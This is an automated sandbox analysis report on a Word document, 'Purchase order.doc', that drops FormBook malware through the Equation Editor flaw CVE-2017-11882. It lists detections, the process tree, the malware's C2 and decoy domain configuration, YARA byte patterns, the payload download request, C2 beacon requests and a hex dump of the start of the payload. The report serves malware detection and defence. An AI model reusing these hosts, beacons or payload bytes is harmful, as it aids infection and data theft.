Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase order.doc

Overview

General Information

Sample Name:Purchase order.doc
Analysis ID:510256
MD5:b0e95a4af180627b781257494c5bd43b
SHA1:a660ad6781f25a7a3ce699751495f0cb2adf7196
SHA256:51d82db8f2b1b3d5387e3c400b1a3ad27371e4340343aa4affe4165d51334d90
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2596 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2856 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • villar8681.exe (PID: 2808 cmdline: C:\Users\user\AppData\Roaming\villar8681.exe MD5: E78C85674617F34A2F69FFC8DA6A3C48)
      • villar8681.exe (PID: 1312 cmdline: C:\Users\user\AppData\Roaming\villar8681.exe MD5: E78C85674617F34A2F69FFC8DA6A3C48)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 344 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 2584 cmdline: /c del 'C:\Users\user\AppData\Roaming\villar8681.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.filecrev.com/jy0b/"], "decoy": ["lamejorimagen.com", "mykabukibrush.com", "modgon.com", "barefoottherapeutics.com", "shimpeg.net", "trade-sniper.com", "chiangkhancityhotel.com", "joblessmoni.club", "stespritsubways.com", "chico-group.com", "nni8.xyz", "searchtypically.online", "jobsyork.com", "bestsales-crypto.com", "iqmarketing.info", "bullcityphotobooths.com", "fwssc.icu", "1oc87s.icu", "usdiesel.xyz", "secrets2optimumnutrition.com", "charlotte-s-creations.com", "homenetmidrand.com", "sytypij.xyz", "tapehitsscriptsparty.com", "adelenashville.com", "greendylife.com", "agbqs.com", "lilcrox.xyz", "thepersonalevolutionmaven.com", "graciasmiangel.com", "heidisgifts.com", "flchimneyspecialists.com", "yorkrehabclinic.com", "cent-pour-centsons.com", "marcoislandsupsurf.net", "expressdiagnostics.info", "surferjackproductions.com", "duscopy.store", "uekra.tech", "campaigncupgunplant.xyz", "cheetahadvance.com", "blickosinski.icu", "laketacostahoe.com", "drippysupplyco.com", "isomassagegun.com", "clarition.com", "andrew-pillar.com", "truthbudgeting.com", "cloudfixr.com", "cfasministries.com", "compliant-now-beta.com", "kssc17.icu", "plewabuilders.com", "uslugi-email.site", "167hours.com", "sodo6697.com", "voyagesify.com", "ranodalei.com", "culturao.com", "littlepotato-id.com", "integtiryhvacsanmateo.com", "neatmounts.com", "reddictnflstream.com", "digistore-maya.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.0.villar8681.exe.400000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.villar8681.exe.400000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.villar8681.exe.400000.5.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
        5.2.villar8681.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.villar8681.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2856, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2856, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\villar8681.exe, CommandLine: C:\Users\user\AppData\Roaming\villar8681.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\villar8681.exe, NewProcessName: C:\Users\user\AppData\Roaming\villar8681.exe, OriginalFileName: C:\Users\user\AppData\Roaming\villar8681.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2856, ProcessCommandLine: C:\Users\user\AppData\Roaming\villar8681.exe, ProcessId: 2808

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.filecrev.com/jy0b/"], "decoy": ["lamejorimagen.com", "mykabukibrush.com", "modgon.com", "barefoottherapeutics.com", "shimpeg.net", "trade-sniper.com", "chiangkhancityhotel.com", "joblessmoni.club", "stespritsubways.com", "chico-group.com", "nni8.xyz", "searchtypically.online", "jobsyork.com", "bestsales-crypto.com", "iqmarketing.info", "bullcityphotobooths.com", "fwssc.icu", "1oc87s.icu", "usdiesel.xyz", "secrets2optimumnutrition.com", "charlotte-s-creations.com", "homenetmidrand.com", "sytypij.xyz", "tapehitsscriptsparty.com", "adelenashville.com", "greendylife.com", "agbqs.com", "lilcrox.xyz", "thepersonalevolutionmaven.com", "graciasmiangel.com", "heidisgifts.com", "flchimneyspecialists.com", "yorkrehabclinic.com", "cent-pour-centsons.com", "marcoislandsupsurf.net", "expressdiagnostics.info", "surferjackproductions.com", "duscopy.store", "uekra.tech", "campaigncupgunplant.xyz", "cheetahadvance.com", "blickosinski.icu", "laketacostahoe.com", "drippysupplyco.com", "isomassagegun.com", "clarition.com", "andrew-pillar.com", "truthbudgeting.com", "cloudfixr.com", "cfasministries.com", "compliant-now-beta.com", "kssc17.icu", "plewabuilders.com", "uslugi-email.site", "167hours.com", "sodo6697.com", "voyagesify.com", "ranodalei.com", "culturao.com", "littlepotato-id.com", "integtiryhvacsanmateo.com", "neatmounts.com", "reddictnflstream.com", "digistore-maya.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase order.docVirustotal: Detection: 40%Perma Link
          Source: Purchase order.docReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://binatonezx.tk/villarzx.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: binatonezx.tkVirustotal: Detection: 15%Perma Link
          Source: www.filecrev.comVirustotal: Detection: 5%Perma Link
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exeReversingLabs: Detection: 37%
          Source: C:\Users\user\AppData\Roaming\villar8681.exeReversingLabs: Detection: 37%
          Source: 5.0.villar8681.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.villar8681.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.villar8681.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.villar8681.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\villar8681.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: villar8681.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
          Source: global trafficDNS query: name: binatonezx.tk
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 2.56.59.211:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 2.56.59.211:80
          Source: winword.exeMemory has grown: Private usage: 0MB later: 106MB

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.charlotte-s-creations.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.156.84.168 80
          Source: C:\Windows\explorer.exeDomain query: www.filecrev.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.165.66.108 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.filecrev.com/jy0b/
          Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
          Source: global trafficHTTP traffic detected: GET /jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj HTTP/1.1Host: www.filecrev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj HTTP/1.1Host: www.charlotte-s-creations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 2.56.59.211 2.56.59.211
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 14:39:11 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Wed, 27 Oct 2021 07:18:31 GMTETag: "82400-5cf5066baacfe"Accept-Ranges: bytesContent-Length: 533504Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 a2 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 08 00 00 0a 00 00 00 00 00 00 0a 36 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 35 08 00 4f 00 00 00 00 40 08 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 16 08 00 00 20 00 00 00 18 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 28 06 00 00 00 40 08 00 00 08 00 00 00 1a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 22 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 35 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 b8 be 00 00 03 00 00 00 74 01 00 06 c8 7c 01 00 f0 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00
          Source: global trafficHTTP traffic detected: GET /villarzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.0Date: Wed, 27 Oct 2021 14:40:40 GMTContent-Type: application/json; charset=utf-8Content-Length: 181Connection: closeX-Powered-By: ExpressETag: W/"b5-7t+tQyc7QpflCZNr+ruKCrIOKs0"Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 63 6c 69 63 6b 2f 70 72 6f 78 79 6a 73 2f 6a 79 30 62 2f 3f 30 36 33 38 34 44 71 70 3d 54 79 47 44 4a 68 4c 2f 63 41 2b 35 37 77 66 75 66 61 5a 52 79 4d 4d 72 51 6b 38 75 50 64 32 64 36 4e 66 59 38 31 52 73 6a 34 36 62 5a 68 4f 4a 4c 58 67 5a 35 32 32 42 75 70 42 45 37 2b 42 71 51 73 50 38 38 51 3d 3d 26 63 74 3d 58 68 68 34 6e 4c 33 38 59 4e 76 70 6a 22 7d Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj"}
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: villar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.432356441.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.467536657.0000000001D60000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.432208607.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.453889222.0000000008448000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: villar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
